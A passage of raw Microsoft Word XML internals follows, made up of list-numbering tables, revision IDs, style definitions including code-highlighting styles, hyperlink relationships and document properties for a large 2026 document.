    <w:abstractNumId w:val="487"/>
  </w:num>
  <w:num w:numId="1505" w16cid:durableId="1017076278">
    <w:abstractNumId w:val="111"/>
  </w:num>
  <w:num w:numId="1506" w16cid:durableId="788282014">
    <w:abstractNumId w:val="235"/>
  </w:num>
  <w:num w:numId="1507" w16cid:durableId="629436980">
    <w:abstractNumId w:val="139"/>
  </w:num>
  <w:num w:numId="1508" w16cid:durableId="259457141">
    <w:abstractNumId w:val="1450"/>
  </w:num>
  <w:num w:numId="1509" w16cid:durableId="1943145811">
    <w:abstractNumId w:val="921"/>
  </w:num>
  <w:num w:numId="1510" w16cid:durableId="1602684473">
    <w:abstractNumId w:val="1064"/>
  </w:num>
  <w:num w:numId="1511" w16cid:durableId="805125963">
    <w:abstractNumId w:val="1085"/>
  </w:num>
  <w:num w:numId="1512" w16cid:durableId="325863738">
    <w:abstractNumId w:val="1122"/>
  </w:num>
  <w:num w:numId="1513" w16cid:durableId="2137260533">
    <w:abstractNumId w:val="101"/>
  </w:num>
  <w:num w:numId="1514" w16cid:durableId="925653232">
    <w:abstractNumId w:val="1046"/>
  </w:num>
  <w:num w:numId="1515" w16cid:durableId="356277061">
    <w:abstractNumId w:val="746"/>
  </w:num>
  <w:num w:numId="1516" w16cid:durableId="627080512">
    <w:abstractNumId w:val="608"/>
  </w:num>
  <w:num w:numId="1517" w16cid:durableId="1256750443">
    <w:abstractNumId w:val="1127"/>
  </w:num>
  <w:num w:numId="1518" w16cid:durableId="781464037">
    <w:abstractNumId w:val="867"/>
  </w:num>
  <w:num w:numId="1519" w16cid:durableId="1140655824">
    <w:abstractNumId w:val="1298"/>
  </w:num>
  <w:num w:numId="1520" w16cid:durableId="349795841">
    <w:abstractNumId w:val="1386"/>
  </w:num>
  <w:num w:numId="1521" w16cid:durableId="1472096386">
    <w:abstractNumId w:val="887"/>
  </w:num>
  <w:num w:numId="1522" w16cid:durableId="1287203940">
    <w:abstractNumId w:val="212"/>
  </w:num>
  <w:num w:numId="1523" w16cid:durableId="1238324797">
    <w:abstractNumId w:val="573"/>
  </w:num>
  <w:num w:numId="1524" w16cid:durableId="1101678596">
    <w:abstractNumId w:val="634"/>
  </w:num>
  <w:num w:numId="1525" w16cid:durableId="83891044">
    <w:abstractNumId w:val="248"/>
  </w:num>
  <w:num w:numId="1526" w16cid:durableId="1978142607">
    <w:abstractNumId w:val="113"/>
  </w:num>
  <w:num w:numId="1527" w16cid:durableId="1826432874">
    <w:abstractNumId w:val="294"/>
  </w:num>
  <w:num w:numId="1528" w16cid:durableId="904679976">
    <w:abstractNumId w:val="1143"/>
  </w:num>
  <w:num w:numId="1529" w16cid:durableId="1286084088">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="1530" w16cid:durableId="69886359">
    <w:abstractNumId w:val="1435"/>
  </w:num>
  <w:num w:numId="1531" w16cid:durableId="1363827057">
    <w:abstractNumId w:val="760"/>
  </w:num>
  <w:num w:numId="1532" w16cid:durableId="1922712501">
    <w:abstractNumId w:val="211"/>
  </w:num>
  <w:num w:numId="1533" w16cid:durableId="1116023037">
    <w:abstractNumId w:val="676"/>
  </w:num>
  <w:num w:numId="1534" w16cid:durableId="775561095">
    <w:abstractNumId w:val="494"/>
  </w:num>
  <w:num w:numId="1535" w16cid:durableId="1979341236">
    <w:abstractNumId w:val="596"/>
  </w:num>
  <w:num w:numId="1536" w16cid:durableId="1186484050">
    <w:abstractNumId w:val="376"/>
  </w:num>
  <w:num w:numId="1537" w16cid:durableId="673460785">
    <w:abstractNumId w:val="859"/>
  </w:num>
  <w:num w:numId="1538" w16cid:durableId="1809739711">
    <w:abstractNumId w:val="731"/>
  </w:num>
  <w:num w:numId="1539" w16cid:durableId="840268869">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="1540" w16cid:durableId="2109546474">
    <w:abstractNumId w:val="745"/>
  </w:num>
  <w:num w:numId="1541" w16cid:durableId="342320159">
    <w:abstractNumId w:val="123"/>
  </w:num>
  <w:num w:numId="1542" w16cid:durableId="581139298">
    <w:abstractNumId w:val="741"/>
  </w:num>
  <w:num w:numId="1543" w16cid:durableId="38750978">
    <w:abstractNumId w:val="667"/>
  </w:num>
  <w:num w:numId="1544" w16cid:durableId="2095937259">
    <w:abstractNumId w:val="1112"/>
  </w:num>
  <w:num w:numId="1545" w16cid:durableId="896740653">
    <w:abstractNumId w:val="1299"/>
  </w:num>
  <w:num w:numId="1546" w16cid:durableId="1659116698">
    <w:abstractNumId w:val="1266"/>
  </w:num>
  <w:num w:numId="1547" w16cid:durableId="176357398">
    <w:abstractNumId w:val="920"/>
  </w:num>
  <w:num w:numId="1548" w16cid:durableId="1960448031">
    <w:abstractNumId w:val="110"/>
  </w:num>
  <w:num w:numId="1549" w16cid:durableId="1391074098">
    <w:abstractNumId w:val="719"/>
  </w:num>
  <w:num w:numId="1550" w16cid:durableId="1335960787">
    <w:abstractNumId w:val="192"/>
  </w:num>
  <w:num w:numId="1551" w16cid:durableId="1066029786">
    <w:abstractNumId w:val="1137"/>
  </w:num>
  <w:num w:numId="1552" w16cid:durableId="1737778847">
    <w:abstractNumId w:val="687"/>
  </w:num>
  <w:num w:numId="1553" w16cid:durableId="1327973552">
    <w:abstractNumId w:val="594"/>
  </w:num>
  <w:num w:numId="1554" w16cid:durableId="224148309">
    <w:abstractNumId w:val="1086"/>
  </w:num>
  <w:num w:numId="1555" w16cid:durableId="1847749496">
    <w:abstractNumId w:val="1495"/>
  </w:num>
  <w:num w:numId="1556" w16cid:durableId="1139569583">
    <w:abstractNumId w:val="445"/>
  </w:num>
  <w:num w:numId="1557" w16cid:durableId="525681579">
    <w:abstractNumId w:val="1134"/>
  </w:num>
  <w:num w:numId="1558" w16cid:durableId="744957080">
    <w:abstractNumId w:val="519"/>
  </w:num>
  <w:num w:numId="1559" w16cid:durableId="780146381">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="1560" w16cid:durableId="446437772">
    <w:abstractNumId w:val="1202"/>
  </w:num>
  <w:num w:numId="1561" w16cid:durableId="423189739">
    <w:abstractNumId w:val="940"/>
  </w:num>
  <w:num w:numId="1562" w16cid:durableId="1821851307">
    <w:abstractNumId w:val="1527"/>
  </w:num>
  <w:num w:numId="1563" w16cid:durableId="1142576045">
    <w:abstractNumId w:val="1214"/>
  </w:num>
  <w:num w:numId="1564" w16cid:durableId="1309821978">
    <w:abstractNumId w:val="1251"/>
  </w:num>
  <w:num w:numId="1565" w16cid:durableId="822354544">
    <w:abstractNumId w:val="718"/>
  </w:num>
  <w:num w:numId="1566" w16cid:durableId="2032102740">
    <w:abstractNumId w:val="1272"/>
  </w:num>
  <w:num w:numId="1567" w16cid:durableId="690838722">
    <w:abstractNumId w:val="415"/>
  </w:num>
  <w:num w:numId="1568" w16cid:durableId="997223180">
    <w:abstractNumId w:val="1108"/>
  </w:num>
  <w:num w:numId="1569" w16cid:durableId="1162618569">
    <w:abstractNumId w:val="1421"/>
  </w:num>
  <w:num w:numId="1570" w16cid:durableId="131413431">
    <w:abstractNumId w:val="572"/>
  </w:num>
  <w:num w:numId="1571" w16cid:durableId="1779914092">
    <w:abstractNumId w:val="1157"/>
  </w:num>
  <w:num w:numId="1572" w16cid:durableId="1994064132">
    <w:abstractNumId w:val="979"/>
  </w:num>
  <w:num w:numId="1573" w16cid:durableId="831605106">
    <w:abstractNumId w:val="437"/>
  </w:num>
  <w:num w:numId="1574" w16cid:durableId="559250655">
    <w:abstractNumId w:val="1047"/>
  </w:num>
  <w:num w:numId="1575" w16cid:durableId="2042976490">
    <w:abstractNumId w:val="1476"/>
  </w:num>
  <w:num w:numId="1576" w16cid:durableId="993031023">
    <w:abstractNumId w:val="1477"/>
  </w:num>
  <w:num w:numId="1577" w16cid:durableId="1153183104">
    <w:abstractNumId w:val="593"/>
  </w:num>
  <w:num w:numId="1578" w16cid:durableId="187456208">
    <w:abstractNumId w:val="633"/>
  </w:num>
  <w:num w:numId="1579" w16cid:durableId="799802343">
    <w:abstractNumId w:val="469"/>
  </w:num>
  <w:num w:numId="1580" w16cid:durableId="391584050">
    <w:abstractNumId w:val="311"/>
  </w:num>
  <w:num w:numId="1581" w16cid:durableId="1261647500">
    <w:abstractNumId w:val="1090"/>
  </w:num>
  <w:num w:numId="1582" w16cid:durableId="821582919">
    <w:abstractNumId w:val="1499"/>
  </w:num>
  <w:num w:numId="1583" w16cid:durableId="161699067">
    <w:abstractNumId w:val="186"/>
  </w:num>
  <w:num w:numId="1584" w16cid:durableId="1656497349">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="1585" w16cid:durableId="1600799386">
    <w:abstractNumId w:val="1254"/>
  </w:num>
  <w:num w:numId="1586" w16cid:durableId="1113941108">
    <w:abstractNumId w:val="1217"/>
  </w:num>
  <w:num w:numId="1587" w16cid:durableId="370543940">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="1588" w16cid:durableId="1322850774">
    <w:abstractNumId w:val="1508"/>
  </w:num>
  <w:num w:numId="1589" w16cid:durableId="978850174">
    <w:abstractNumId w:val="1339"/>
  </w:num>
  <w:num w:numId="1590" w16cid:durableId="492647208">
    <w:abstractNumId w:val="852"/>
  </w:num>
  <w:num w:numId="1591" w16cid:durableId="1345788395">
    <w:abstractNumId w:val="320"/>
  </w:num>
  <w:numIdMacAtCleanup w:val="15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0D8"/>
    <w:rsid w:val="001F0BD6"/>
    <w:rsid w:val="001F1994"/>
    <w:rsid w:val="002D1EC9"/>
    <w:rsid w:val="002E404A"/>
    <w:rsid w:val="0037017A"/>
    <w:rsid w:val="00397DF6"/>
    <w:rsid w:val="003D61F4"/>
    <w:rsid w:val="004259D5"/>
    <w:rsid w:val="00433B4B"/>
    <w:rsid w:val="00476518"/>
    <w:rsid w:val="00487CAD"/>
    <w:rsid w:val="0049626E"/>
    <w:rsid w:val="00496A4D"/>
    <w:rsid w:val="00563018"/>
    <w:rsid w:val="005C5B1F"/>
    <w:rsid w:val="006E6644"/>
    <w:rsid w:val="006F072B"/>
    <w:rsid w:val="00784ED6"/>
    <w:rsid w:val="007A2456"/>
    <w:rsid w:val="00875520"/>
    <w:rsid w:val="008A51E9"/>
    <w:rsid w:val="00A12791"/>
    <w:rsid w:val="00AD5AD3"/>
    <w:rsid w:val="00BD4FEB"/>
    <w:rsid w:val="00CD4FCD"/>
    <w:rsid w:val="00D240D8"/>
    <w:rsid w:val="00D66978"/>
    <w:rsid w:val="00EF2B0F"/>
    <w:rsid w:val="00F15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71621"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3C75F568-F572-403D-8F26-53EA7D720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0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40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40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0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0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0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40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40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0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0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0D8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D24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0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0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0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0D8"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D240D8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D240D8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D240D8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D240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0D8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D240D8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00433B4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33B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33B4B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00433B4B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="languagedot-modulelanguagedotwzeoh">
    <w:name w:val="languagedot-module__languagedot__wzeoh"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00433B4B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeblock-modulelanguagenameiqieg">
    <w:name w:val="codeblock-module__languagename__iqieg"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00433B4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00433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33B4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33B4B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006F072B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006F072B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006F072B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006F072B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F072B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F072B"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F072B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-bullet">
    <w:name w:val="hljs-bullet"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-punctuation">
    <w:name w:val="hljs-punctuation"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00563018"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006E6644"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00784ED6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00784ED6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00784ED6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00784ED6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-property">
    <w:name w:val="hljs-property"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00784ED6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A12791"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A12791"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00496A4D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0037017A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-TopofForm">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="z-TopofFormChar"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0037017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37017A"/>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37017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37017A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sr-only">
    <w:name w:val="sr-only"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001F0BD6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="emptystate-modulesubtitleffqfv">
    <w:name w:val="emptystate-module__subtitle__ffqfv"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001F0BD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stspreload.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.examp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example.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C18DB8-AC42-4BE8-B889-9E24A33E9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1759</Pages>
  <Words>330313</Words>
  <Characters>1882789</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15689</Lines>
  <Paragraphs>4417</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2208685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Mohite, Sneha R</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mohite, Sneha R</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-28T14:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-28T19:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>